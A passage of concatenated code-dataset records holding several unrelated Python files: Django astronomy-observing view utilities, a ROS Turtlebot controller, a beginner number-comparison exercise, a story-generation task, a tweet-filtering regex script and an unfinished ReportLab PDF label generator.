TransientPhotData.objects.filter(photometry=p.id).order_by('-obs_date')[::-1]\n\t\tfor ph in photdata:\n\t\t\tif ph.discovery_point:\n\t\t\t\treturn(ph)\n\t\t\telif ph.mag:\n\t\t\t\tfirstphot = ph\n\t\t\t\n\treturn(firstphot)\n\ndef get_disc_mag_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tfirstphot = None\n\tfor p in photometry:\n\t\t\tphotdata = TransientPhotData.objects.filter(photometry=p.id).order_by('-obs_date')[::-1]\n\t\t\tfor ph in photdata:\n\t\t\t\tif ph.discovery_point:\n\t\t\t\t\treturn(ph)\n\t\t\t\telif ph.mag:\n\t\t\t\t\tfirstphot = ph\n\n\treturn(firstphot)\n\n\t\ndef getMoonAngle(observingdate,telescope,ra,dec):\n\tif observingdate:\n\t\tobstime = Time(observingdate,scale='utc')\n\telse:\n\t\tobstime = Time(datetime.datetime.now())\n\tmooncoord = get_moon(obstime)\n\tcs = SkyCoord(ra,dec,unit=u.deg)\n\treturn('%.1f'%cs.separation(mooncoord).deg)\n\t\ndef getObsNights(transient):\n\n\tobsnights,tellist = (),()\n\tfor o in ClassicalObservingDate.objects.order_by('-obs_date')[::-1]:\n\t\tif not o.happening_soon(): continue\n\t\ttelescope = get_telescope_from_obsnight(o.id)\n\t\tobservatory = get_observatory_from_telescope(telescope.id)\n\t\tcan_obs = 1\n\t\to.telescope = telescope.name\n\t\tobsnights += ([o,can_obs],)\n\t\tif can_obs and telescope not in tellist: tellist += (telescope,)\n\treturn obsnights,tellist\n\ndef getTimeUntilRiseSet(ra,dec,date,lat,lon,elev,utc_off):\n\tif date:\n\t\ttime = Time(date)\n\telse:\n\t\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord(ra,dec,unit=u.deg)\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tlon*u.deg,lat*u.deg,\n\t\telev*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\t#night_start = tel.twilight_evening_civil(time,which=\"previous\")\n\t#night_end = tel.twilight_morning_civil(time,which=\"previous\")\n\ttarget_rise_time = tel.target_rise_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\ttarget_set_time = tel.target_set_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\t\n#\t start_obs = False\n#\t starttime,endtime = None,None\n#\t for jd in np.arange(night_start.mjd,night_end.mjd,0.05):\n#\t\t time = Time(jd,format=\"mjd\")\n#\t\t target_up = tel.target_is_up(time,sc,horizon=18*u.deg)\n#\t\t if target_up and not start_obs:\n#\t\t\t start_obs = True\n#\t\t\t starttime = copy.copy(time)\n#\t\t if not target_up and start_obs:\n#\t\t\t can_obs = False\n#\t\t\t endtime = copy.copy(time)\n#\t\t\t break\n\n\tif target_rise_time:\n\t\treturnstarttime = target_rise_time.isot.split('T')[-1]\n\telse: returnstarttime = None\n\tif target_set_time:\n\t\treturnendtime = target_set_time.isot.split('T')[-1]\n\telse: returnendtime = None\n\n\t\n\treturn(returnstarttime,returnendtime)\n\n\t\ndef telescope_can_observe(ra,dec,date,lat,lon,elev,utc_off):\n\tif date:\n\t\ttime = Time(date)\n\telse:\n\t\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord(ra,dec,unit=u.deg)\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tlon*u.deg,lat*u.deg,\n\t\telev*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\t\n\tnight_start = tel.twilight_evening_astronomical(time,which=\"previous\")\n\tnight_end = tel.twilight_morning_astronomical(time,which=\"previous\")\n\tcan_obs = False\n\tfor jd in np.arange(night_start.mjd,night_end.mjd,0.02):\n\t\ttime = Time(jd,format=\"mjd\")\n\t\ttarget_up = tel.target_is_up(time,sc,horizon=18*u.deg)\n\t\tif target_up:\n\t\t\tcan_obs = True\n\t\t\tbreak\n\n\treturn(can_obs)\n\ndef get_observatory_from_telescope(telescope_id):\n\ttel = Telescope.objects.filter(id=telescope_id)[0]\n\tobservatory = Observatory.objects.filter(id=tel.observatory_id)[0]\n\treturn(observatory)\n\ndef get_telescope_from_obsnight(obsnight_id):\n\tclassobsdate = ClassicalObservingDate.objects.filter(id=obsnight_id)[0]\n\tclassresource = ClassicalResource.objects.filter(id=classobsdate.resource_id)[0]\n\ttelescope = Telescope.objects.filter(id=classresource.telescope_id)[0]\n\treturn(telescope)\n\nclass finder(TemplateView):\n\ttemplate_name = 'YSE_App/finder.html'\n\t\n\tdef __init__(self):\n\t\tpass\n\tdef finderchart(self, request, transient_id):\n\t\timport os\n\t\tfrom .util import mkFinderChart\n\n\t\tfrom django.contrib.staticfiles.templatetags.staticfiles import static\n\t\tfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\t\tfrom matplotlib.figure import Figure\n\t\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tbasedir = \"%sYSE_App/images/findercharts\"%(djangoSettings.STATIC_ROOT)\n\t\tif not os.path.exists(basedir):\n\t\t\tos.makedirs(basedir)\n\t\t\n\t\toutputOffsetFileName = '%s/%s.offsetstars.txt'%(\n\t\t\tbasedir,transient.name)\n\t\toutputFinderFileName = '%s/%s.finder.png'%(\n\t\t\tbasedir,transient.name)\n\t\tif os.path.exists(outputOffsetFileName) and\\\n\t\t os.path.exists(outputFinderFileName):\n\t\t\treturn HttpResponseRedirect(reverse('transient_detail',\n\t\t\t\t\t\t\t\t\t\t\t\targs=(transient.id,)))\n\n\t\tfind = mkFinderChart.finder()\n\t\tparser = find.add_options(usage='')\n\t\toptions, args = parser.parse_args()\n\t\toptions.ra = str(transient.ra)\n\t\toptions.dec = str(transient.dec)\n\t\toptions.snid = transient.name\n\t\t#options.outputOffsetFileName = outputOffsetFileName\n\t\toptions.outputFinderFileName = outputFinderFileName\n\t\tfind.options = options\n\t\timport pylab as plt\n\t\n\t\tfig=Figure()\n\t\tax = fig.add_axes([0.2,0.3,0.6,0.6])\n\t\tcanvas=FigureCanvas(fig)\n\t\tax,offdictlist = find.mkChart(options.ra,options.dec,\n\t\t\t\t\t\t\t\t\t options.outputFinderFileName,\n\t\t\t\t\t\t\t\t\t ax=ax,saveImg=False)\n\t\t\n\t\tcontext = {'t':transient,\n\t\t\t\t 'offsets':offdictlist}\n\t\t\n\t\t#return response\n\t\treturn render(request,'YSE_App/finder.html',\n\t\t\t\t\t context)\n\n\tdef finderim(self, request, transient_id):\n\t\timport os\n\t\tfrom .util import mkFinderChart\n\t\tfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\t\tfrom matplotlib.figure import Figure\n\t\timport pylab as plt\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tbasedir = \"%sYSE_App/images/findercharts\"%(djangoSettings.STATIC_ROOT)\n\t\tif not os.path.exists(basedir):\n\t\t\tos.makedirs(basedir)\n\t\t\n\t\toutputOffsetFileName = '%s/%s.offsetstars.txt'%(\n\t\t\tbasedir,transient.name)\n\t\toutputFinderFileName = '%s/%s.finder.png'%(\n\t\t\tbasedir,transient.name)\n\t\tif os.path.exists(outputOffsetFileName) and\\\n\t\t os.path.exists(outputFinderFileName):\n\t\t\treturn HttpResponseRedirect(reverse('transient_detail',\n\t\t\t\t\t\t\t\t\t\t\t\targs=(transient.id,)))\n\n\t\t\n\t\tfig=Figure()\n\t\tax = fig.add_axes([0.2,0.3,0.6,0.6])\n\t\tcanvas=FigureCanvas(fig)\n\n\t\tfind = mkFinderChart.finder()\n\t\tparser = find.add_options(usage='')\n\t\toptions, args = parser.parse_args()\n\t\toptions.ra = str(transient.ra)\n\t\toptions.dec = str(transient.dec)\n\t\toptions.snid = transient.name\n\t\t#options.outputOffsetFileName = outputOffsetFileName\n\t\toptions.outputFinderFileName = outputFinderFileName\n\t\tfind.options = options\n\t\tax,offdictlist = find.mkChart(options.ra,options.dec,\n\t\t\t\t\t\t\t\t\t options.outputFinderFileName,\n\t\t\t\t\t\t\t\t\t ax=ax,saveImg=False)\n\t\t\n\t\tresponse=django.http.HttpResponse(content_type='image/png')\n\t\tcanvas.print_png(response)\n\n\t\treturn response\n\t\n## We should refactor this so that it takes:\n# - transient\n# - observatory (or maybe array of observatory)\n# - \n# And it can returns the data which can be plotted on the front end\n# i.e. a tuple of (datetime, airmass) that ChartJS can plot on the \n# client \n \ndef airmassplot(request, transient_id, obs_id, telescope_id):\n\t\timport random\n\t\timport django\n\t\timport datetime\n\t\tfrom astroplan.plots import plot_airmass\n\t\t\n\t\tfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\t\tfrom matplotlib.figure import Figure\n\t\tfrom matplotlib.dates import DateFormatter\n\t\tfrom matplotlib import rcParams\n\t\trcParams['figure.figsize'] = (7,7)\n\t\t\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tif int(obs_id):\n\t\t\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\t\tobs_date = obsnight.obs_date\n\t\telse:\n\t\t\tobs_date = datetime.date.today() #time.now()\n\t\t\t\n\t\ttelescope = Telescope.objects.get(pk=telescope_id)\n\t\t\n\t\ttarget = SkyCoord(transient.ra,transient.dec,unit=u.deg)\n\t\ttime = Time(str(obs_date).split('+')[0], format='iso')\n\t\t\n\t\tlocation = EarthLocation.from_geodetic(telescope.longitude*u.deg, telescope.latitude*u.deg,telescope.elevation*u.m)\n\t\ttel = Observer(location=location, name=telescope.name, timezone=\"UTC\")\n\t\t\n\t\tfig=Figure()\n\t\tax=fig.add_subplot(111)\n\t\tcanvas=FigureCanvas(fig)\n\n\t\tax.set_title(\"%s, %s, %s\"%(telescope.tostring(),transient.name, obs_date))\n\n\t\tnight_start = tel.twilight_evening_astronomical(time,which=\"previous\")\n\t\tnight_end = tel.twilight_morning_astronomical(time,which=\"previous\")\n\t\tdelta_t = night_end - night_start\n\t\tobserve_time = night_start + delta_t*np.linspace(0, 1, 75)\n\t\tplot_airmass(target, tel, observe_time, ax=ax)\t \n\n\t\tyr,mn,day,hr,minu,sec = night_start.iso.replace(':',' ').replace('-',' ').split()\n\t\tstarttime = datetime.datetime(int(yr),int(mn),int(day),int(hr),int(minu))\n\t\tif int(hr) == 0:\n\t\t\txlow = datetime.datetime(int(yr),int(mn),int(day)-1,23,int(minu))\n\t\telse:\n\t\t\txlow = datetime.datetime(int(yr),int(mn),int(day),int(hr)-1,int(minu))\n\t\tyr,mn,day,hr,minu,sec = night_end.iso.replace(':',' ').replace('-',' ').split()\n\t\tendtime = datetime.datetime(int(yr),int(mn),int(day),int(hr),int(minu))\n\t\txhi = datetime.datetime(int(yr),int(mn),int(day),int(hr)+1,int(minu))\n\t\tax.axvline(starttime,color='r',label='18 deg twilight')#night_start.iso)\n\t\tax.axvline(endtime,color='r')\n\t\tax.legend(loc='lower right')\n\t\t\n\t\tax.set_xlim([xlow,xhi])\n\t\t\n\t\tresponse=django.http.HttpResponse(content_type='image/png')\n\t\tcanvas.print_png(response)\n\t\treturn response\n\ndef lightcurveplot(request, transient_id):\n\t\n\t\timport random\n\t\timport django\n\t\timport datetime\n\t\timport time\n\t\tfrom bokeh.plotting import figure\n\t\tfrom bokeh.resources import CDN\n\t\tfrom bokeh.embed import file_html\n\t\tfrom bokeh.models import Range1d,Span\n\t\tfrom bokeh.core.properties import FontSizeSpec\n\t\ttstart = time.time()\n\t\t\n\t\ttransient = Transient.objects.get(pk=transient_id)\n\t\tphotdata = get_all_phot_for_transient(transient_id)\n\t\tif not photdata:\n\t\t\treturn django.http.HttpResponse('')\n\n\t\tax=figure()\n\n\t\tmjd,mag,magerr,band,bandstr,telescope = \\\n\t\t\tnp.array([]),np.array([]),np.array([]),np.array([]),np.array([]),np.array([])\n\t\tlimmjd = None\n\t\tfor p in photdata:\n\t\t\tif p.flux and np.abs(p.flux) > 1e10: continue\n\t\t\tif not p.mag: continue\n\t\t\t\n\t\t\tif p.discovery_point:\n\t\t\t\tlimmjd = p.date_to_mjd()-30\n\t\t\t\t\n\t\t\tmjd = np.append(mjd,[p.date_to_mjd()])\n\t\t\tmag = np.append(mag,[p.mag])\n\t\t\tif p.mag_err: magerr = np.append(magerr,p.mag_err)\n\t\t\telse: magerr = np.append(magerr,0)\n\t\t\tbandstr = np.append(bandstr,str(p.band))\n\t\t\tband = np.append(band,p.band)\n\t\t\t#telescope = np.append(telescope,str(p.band.instrument.telescope.name))\n\t\t\n\t\tax.title.text = \"%s\"%transient.name\n\t\tcolorlist = ['#1f77b4','#ff7f0e','#2ca02c','#d62728',\n\t\t\t\t\t '#9467bd','#8c564b','#e377c2','#7f7f7f','#bcbd22','#17becf']\n\t\tcount = 0\n\n\t\tbandunq,idx = np.unique(bandstr,return_index=True)\n\t\tfor bs,b in zip(bandunq,band[idx]):\n\t\t\tcoloridx = count % len(np.unique(colorlist))\n\t\t\tax.circle(mjd[bandstr == bs].tolist(),mag[bandstr == bs].tolist(),\n\t\t\t\t\t color=colorlist[coloridx],size=7,legend='%s - %s'%(\n\t\t\t\t\tb.instrument.telescope.name,b.name))\n\n\t\t\terr_xs,err_ys = [],[]\n\t\t\tfor x,y,yerr in zip(mjd[bandstr == bs].tolist(),mag[bandstr == bs].tolist(),magerr[bandstr == bs].tolist()):\n\t\t\t\terr_xs.append((x, x))\n\t\t\t\terr_ys.append((y - yerr, y + yerr))\n\t\t\tax.multi_line(err_xs, err_ys, color=colorlist[coloridx])\n\t\t\tcount += 1\n\t\t\t\n\t\ttoday = Time(datetime.datetime.today()).mjd\n\t\tax.line(today,20,line_width=3,line_color='black',legend='today (%i)'%today)\n\t\tvline = Span(location=today, dimension='height', line_color='black',\n\t\t\t\t\t line_width=3)\n\t\tax.add_layout(vline)\n\t\tax.legend.location = 'bottom_left'\n\t\tax.legend.label_height = 1\n\t\tax.legend.glyph_height = 10\n\t\t#import pdb; pdb.set_trace()\n\t\tax.legend.label_text_font_size = \"7pt\"#FontSizeSpec(\"10\")\n\t\t\n\t\tax.xaxis.axis_label = 'MJD'\n\t\tax.yaxis.axis_label = 'Mag'\n\n\t\tif limmjd:\n\t\t\tax.x_range = Range1d(limmjd,np.max(mjd)+10)\n\t\t\tax.y_range = Range1d(np.max(mag[mjd > limmjd])+0.25,np.min(mag[mjd > limmjd])-0.5)\n\t\telse:\n\t\t\tax.x_range=Range1d(np.min(mjd)-10,np.max(mjd)+10)\n\t\t\tax.y_range=Range1d(np.max(mag)+0.25,np.min(mag)-0.5)\n\t\t#ax.legend()\n\t\tax.plot_height = 400\n\t\tax.plot_width = 500\n\t\t\n\t\t#ax.grid(color='lightgray', alpha=0.7)\n\t\t#g = mpld3.fig_to_html(fig,template_type='simple')\n\n\t\tg = file_html(ax,CDN,\"my plot\")\n\t\t\n\t\treturn HttpResponse(g.replace('width: 90%','width: 100%'))\n\ndef rise_time(request,transient_id,obs_id):\n\n\timport time\n\ttstart = time.time()\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\n\ttme = Time(str(obsnight.obs_date).split()[0])\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.resource.telescope.longitude*u.deg,obsnight.resource.telescope.latitude*u.deg,\n\t\tobsnight.resource.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_rise_time = tel.target_rise_time(tme,sc,horizon=18*u.deg,which=\"previous\")\n\t\n\tif target_rise_time:\n\t\trisetime = target_rise_time.isot.split('T')[-1]\n\telse: \n\t\trisetime = None\n\t\t\t\n\tprint(time.time()-tstart)\n\trisedict = {'rise_time':risetime}\n\treturn JsonResponse(risedict)\n\ndef set_time(request,transient_id,obs_id):\n\n\timport time\n\ttstart = time.time()\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\n\ttme = Time(str(obsnight.obs_date).split()[0])\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.resource.telescope.longitude*u.deg,obsnight.resource.telescope.latitude*u.deg,\n\t\tobsnight.resource.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_set_time = tel.target_set_time(tme,sc,horizon=18*u.deg,which=\"previous\")\n\t\n\tif target_set_time:\n\t\tsettime = target_set_time.isot.split('T')[-1]\n\telse: \n\t\tsettime = None\n\t\t\t\n\tprint(time.time()-tstart)\n\tsetdict = {'set_time':settime}\n\treturn JsonResponse(setdict)\n\ndef moon_angle(request,transient_id,obs_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ClassicalObservingDate.objects.get(pk=obs_id)\n\t\n\tobstime = Time(str(obsnight.obs_date).split()[0],scale='utc')\n\n\tmooncoord = get_moon(obstime)\n\tcs = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\tmoondict = {'moon_angle':'%.1f deg'%cs.separation(mooncoord).deg}\n\treturn JsonResponse(moondict)\n\ndef tonight_rise_time(request,transient_id,too_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ToOResource.objects.filter(id=too_id)[0]\n\t\n\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.telescope.longitude*u.deg,obsnight.telescope.latitude*u.deg,\n\t\tobsnight.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_rise_time = tel.target_rise_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\n\tif target_rise_time:\n\t\treturnstarttime = target_rise_time.isot.split('T')[-1]\n\telse: returnstarttime = None\n\n\trisedict = {'rise_time':returnstarttime}\n\treturn JsonResponse(risedict)\n\t\n\ndef tonight_set_time(request,transient_id,too_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobsnight = ToOResource.objects.filter(id=too_id)[0]\n\t\n\ttime = Time(datetime.datetime.now())\n\tsc = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\n\tlocation = EarthLocation.from_geodetic(\n\t\tobsnight.telescope.longitude*u.deg,obsnight.telescope.latitude*u.deg,\n\t\tobsnight.telescope.elevation*u.m)\n\ttel = Observer(location=location, timezone=\"UTC\")\n\n\ttarget_set_time = tel.target_set_time(time,sc,horizon=18*u.deg,which=\"previous\")\n\n\tif target_set_time:\n\t\treturnstarttime = target_set_time.isot.split('T')[-1]\n\telse: returnstarttime = None\n\n\tsetdict = {'set_time':returnstarttime}\n\treturn JsonResponse(setdict)\n\t\ndef tonight_moon_angle(request,transient_id,too_id):\n\ttransient = Transient.objects.filter(id=transient_id)[0]\n\tcoords = transient.CoordString()\n\n\tobstime = Time(datetime.datetime.now())\n\tmooncoord = get_moon(obstime)\n\tcs = SkyCoord('%s %s'%(coords[0],coords[1]),unit=(u.hourangle,u.deg))\n\tmoondict = {'moon_angle':'%.1f deg'%cs.separation(mooncoord).deg}\n\treturn JsonResponse(moondict)\n\ndef get_ps1_image(request,transient_id):\n\t\n\ttry:\n\t\tt = Transient.objects.get(pk=transient_id)\n\texcept t.DoesNotExist:\n\t\traise Http404(\"Transient id does not exist\")\n\n\tps1url = (\"http://plpsipp1v.stsci.edu/cgi-bin/ps1cutouts?pos=%.7f+%.7f&filter=color\" % (t.ra,t.dec))\n\ttry:\n\t\tresponse = requests.get(url=ps1url,timeout=5)\n\texcept: return(\"\")\n\tresponse_text = response.content.decode('utf-8')\n\tif \"')[0]\n\t\tjpegurl = \"http:%s\"%jpegurl\n\telse:\n\t\tjpegurl=\"\"\n\n\tjpegurldict = {\"jpegurl\":jpegurl}\n\treturn(JsonResponse(jpegurldict))\n\n\ndef get_hst_image(request,transient_id):\n\t\n\ttry:\n\t\tt = Transient.objects.get(pk=transient_id)\n\texcept t.DoesNotExist:\n\t\traise Http404(\"Transient id does not exist\")\n\n\tstartTime = datetime.datetime.now()\n\tfrom . import common\n\thst=common.mast_query.hstImages(t.ra,t.dec,'Object')\n\thst.getObstable()\n\thst.getJPGurl()\n\tprint(\"I found\",hst.Nimages,\"HST images of\",hst.object,\"located at coordinates\",hst.ra,hst.dec)\n\tprint(\"The cut out images have the following URLs:\")\n\tfitsurllist = []\n\tfor jpg,i in zip(hst.jpglist,range(len(hst.jpglist))):\n\t\tprint(jpg)\n\t\tfitsurllist += [\"https://hla.stsci.edu/cgi-bin/getdata.cgi?config=ops&dataset=%s\"%str(hst.obstable[\"obs_id\"][i]).lower()]\n\tprint(\"Run time was: \",(datetime.datetime.now() - startTime).total_seconds(),\"seconds\")\n\n\tif len(hst.jpglist):\n\t\tjpegurldict = {\"jpegurl\":hst.jpglist,\n\t\t\t\t\t \"fitsurl\":fitsurllist,#list(hst.obstable[\"dataURL\"]),\n\t\t\t\t\t \"obsdate\":list(Time(hst.obstable[\"t_min\"],format='mjd',out_subfmt='date').iso),\n\t\t\t\t\t \"filters\":list(hst.obstable[\"filters\"]),\n\t\t\t\t\t \"inst\":list(hst.obstable[\"instrument_name\"])}\n\telse:\n\t\tjpegurldict = {\"jpegurl\":[],\n\t\t\t\t\t \"fitsurl\":[],\n\t\t\t\t\t \"obsdate\":[],\n\t\t\t\t\t \"filters\":[],\n\t\t\t\t\t \"inst\":[]}\n\n\treturn(JsonResponse(jpegurldict))\n","sub_path":"YSE_App/view_utils.py","file_name":"view_utils.py","file_ext":"py","file_size_in_byte":20242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345563402","text":"import sys\nimport time\nimport numpy as np\n\nimport rospy\n\nfrom kobuki_msgs.msg import BumperEvent\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom tf import transformations as trans\n\n_turtlebot_singleton = None\n\n\ndef get_robot():\n global _turtlebot_singleton\n if _turtlebot_singleton is None:\n _turtlebot_singleton = Turtlebot()\n return _turtlebot_singleton\n\n\nclass Turtlebot(object):\n max_linear = 1.0\n max_angular = 2.0\n\n def __init__(self):\n rospy.init_node('pyturtlebot', anonymous=True)\n rospy.myargv(argv=sys.argv)\n\n self.__x = None\n self.__y = None\n self.__angle = None\n self.__cumulative_angle = 0.0\n self.__have_odom = False\n\n self.on_bumper = None\n\n self.__cmd_vel_pub = rospy.Publisher('/mobile_base/commands/velocity', Twist)\n self.__bumper_sub = rospy.Subscriber('/mobile_base/events/bumper', BumperEvent, self.__bumper_handler)\n self.__odom_sub = rospy.Subscriber('/odom', Odometry, self.__odom_handler)\n\n def move(self, linear=0.0, angular=0.0):\n # Bounds checking\n if abs(linear) > self.max_linear:\n self.say(\"Whoa! Slowing you down to within +/-{0} m/s...\".format(self.max_linear))\n linear = self.max_linear if linear > self.max_linear else linear\n linear = -self.max_linear if linear < -self.max_linear else linear\n if abs(angular) > self.max_angular:\n self.say(\"Whoa! Slowing you down to within +/-{0} rad/s...\".format(self.max_angular))\n angular = self.max_angular if angular > self.max_angular else angular\n angular = -self.max_angular if angular < -self.max_angular else angular\n # Message generation\n msg = Twist()\n msg.linear.x = linear\n msg.angular.z = angular\n # Announce and publish\n self.say(\"Moving ('{linear}' m/s, '{angular}' rad/s)...\".format(linear=linear, angular=angular))\n self.__cmd_vel_pub.publish(msg)\n\n def move_distance(self, distance, velocity=1.0):\n # No bounds checking because we trust people. Not like William.\n r = rospy.Rate(1)\n while not self.__have_odom and not rospy.is_shutdown():\n self.say(\"Waiting for odometry\")\n r.sleep()\n\n msg = Twist()\n msg.linear.x = velocity\n x0 = self.__x\n y0 = self.__y\n r = rospy.Rate(100)\n while not rospy.is_shutdown():\n d = ((self.__x - x0)**2 + (self.__y - y0)**2)**0.5\n if d >= distance:\n break\n\n self.__cmd_vel_pub.publish(msg)\n r.sleep()\n msg.linear.x = 0.0\n self.__cmd_vel_pub.publish(msg)\n\n def turn_angle(self, angle, velocity=1.0):\n # No bounds checking because we trust people. Not like William.\n r = rospy.Rate(1)\n while not self.__have_odom and not rospy.is_shutdown():\n self.say(\"Waiting for odometry\")\n r.sleep()\n\n msg = Twist()\n if angle >= 0:\n msg.angular.z = np.abs(velocity)\n else:\n msg.angular.z = -np.abs(velocity)\n angle0 = self.__cumulative_angle\n r = rospy.Rate(100)\n while not rospy.is_shutdown():\n a_diff = self.__cumulative_angle - angle0\n if (angle > 0 and a_diff >= angle) or (angle < 0 and a_diff <= angle):\n break\n\n self.__cmd_vel_pub.publish(msg)\n r.sleep()\n msg.angular.z = 0.0\n self.__cmd_vel_pub.publish(msg)\n\n def stop(self):\n msg = Twist()\n msg.linear.x = 0.0\n msg.angular.z = 0.0\n self.say(\"Stopping the robot!\")\n self.__cmd_vel_pub.publish(msg)\n\n def wait(self, seconds):\n self.say(\"Waiting for '{0}' seconds.\".format(seconds))\n time.sleep(seconds)\n\n def say(self, msg):\n print(msg)\n sys.stdout.flush()\n\n def __odom_handler(self, msg):\n self.__x = msg.pose.pose.position.x\n self.__y = msg.pose.pose.position.y\n q = msg.pose.pose.orientation\n a = trans.euler_from_quaternion([q.x, q.y, q.z, q.w])[2]\n\n # cumulative angle doesn't wrap. assumes we've not moved more than pi radians\n # since last odom message\n if self.__have_odom:\n a_diff = a - self.__angle\n if a_diff > np.pi:\n a_diff -= 2*np.pi\n elif a_diff < -np.pi:\n a_diff += 2*np.pi\n self.__cumulative_angle += a_diff\n\n self.__angle = a\n self.__have_odom = True\n\n def __bumper_handler(self, msg):\n if msg.state != BumperEvent.PRESSED or msg.bumper != BumperEvent.CENTER:\n return\n if self.on_bumper is not None:\n self.on_bumper.__call__()\n","sub_path":"src/pyturtlebot/turtlebot.py","file_name":"turtlebot.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566324390","text":"#Práctica 5 - Ejercicio 4 - Carlos Cánovas\n#Escriu un programa que te demani dos nombres, de manera que el segon sigui major que el primer.\n#El programa termina escrivint els dos nombre tal i com es demana. \n#\n\na = float(input(\"Introduzca un numero: \"))\nb = float(input(\"Introduzca un numero mayor que %d: \" % (a)))\n\nwhile (b <= a):\n b = float(input(\"%d no es mayor que %d. Vuelve a introducir un numero: \" % (b,a)))\nprint(\"Los numeros escritos son %d y %d\" % (a,b))\n","sub_path":"Python/A5/Actividad Python 5-4.py","file_name":"Actividad Python 5-4.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"172910444","text":"from transformers import pipeline\n\nfrom utils import Context, get_logger, profile_resource_usage\n\nl = get_logger(__name__)\n\nwith profile_resource_usage('story generator'):\n story_gen = pipeline(\n \"text-generation\", \"pranavpsv/gpt2-genre-story-generator\")\n\n\nasync def generate_story(ctx: Context, genre: str, prompt: str,\n max_length: int = 400):\n start = f' <{genre}> '\n out = story_gen(f'{start}{prompt}', max_length=max_length)\n text: str = out[0]['generated_text']\n text = text.replace(start, '')\n await ctx.reply(text)\n","sub_path":"tasks/story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"14354501","text":"import re\n\nfile = open(\"training_set_tweets.txt\", \"r\")\nlines = file.read().split('\\n')\nreg = re.compile(r'^\\d+\\t+\\d+\\t+[^\\\\\\t\\x00]*\\t' \n + r'\\d{4}-\\d{2}-\\d{2}\\s\\d{2}:\\d{2}:\\d{2}$')\n\nfor line in lines:\n if re.match(reg, line):\n print(line)\n","sub_path":"submission/files/get_valid.py","file_name":"get_valid.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389379524","text":"from reportlab.pdfgen import canvas\n\n\nfile_name = 'C:/PP/DCProject/DCP/TestPart/MyPDF.pdf'\ndocumentTitle = 'Order_Title + Order_pk'\nimg = 'C:/PP/DCProject/DCP/TestPart/jf669qNTpM2H5G92EllzGrpy6xptDnfM.png'\n\n\npdf = canvas.Canvas(file_name)\ncanvas.Canvas.setFont(pdf, \"Times-Roman\", 10)\npdf.setTitle(documentTitle)\nmasshtab = 2.834\npdf.rect(0, 0, 210*masshtab, 297*masshtab, stroke=1, fill=0)\n\n'''\nФункция Добавления одного кода\ndef funk():\n detail_title, position_code, position_quantity, order\n1. Добавить рамку\n2. Дабавить текст\n3. Добавить код \n'''\n\n\ndef crete_one_pos(x, y, detail_title, position_code, position_quantity, order, img):\n pdf.rect(x, y, 63.33 * masshtab, 31.5 * masshtab, stroke=1, fill=0)\n canvas.Canvas.drawImage(pdf, img, x+34.83*masshtab, y+3*masshtab, width=25.5 * masshtab, height=25.5 * masshtab)\n pdf.drawString(x+3*masshtab, y+3*masshtab, detail_title)\n pdf.drawString(x+3*masshtab, y+9.375*masshtab, position_code)\n pdf.drawString(x+3*masshtab, y+15.75*masshtab, position_quantity)\n pdf.drawString(x+3*masshtab, y+22.125*masshtab, order)\n\n\ndef create_pdf():\n detail_title = 'detail_title' # получаем из цикла по заказу\n position_code = 'position_code' # получаем из цикла по заказу\n position_quantity = 'position_quantity' # получаем из цикла по заказу\n order = 'order' # получаем из цикла по заказу\n 